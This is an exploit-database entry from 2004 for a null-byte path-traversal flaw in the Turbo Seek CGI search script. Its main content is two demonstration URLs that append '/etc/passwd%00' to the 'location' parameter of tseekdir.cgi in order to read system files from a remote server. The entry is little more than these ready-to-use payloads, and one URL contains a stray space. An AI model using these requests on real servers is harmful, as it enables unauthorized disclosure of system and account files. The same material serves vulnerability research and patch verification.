Turbo Seek Null Byte Error Discloses Files to Remote Users



EDB-ID: 464 CVE: N/A OSVDB-ID: 9900
Author: durito Published: 2004-09-13 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Some demonstration exploit URLs are provided: 

/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin /tseekdir.cgi?id=799&location=/etc/passwd%00


# milw0rm.com [2004-09-13]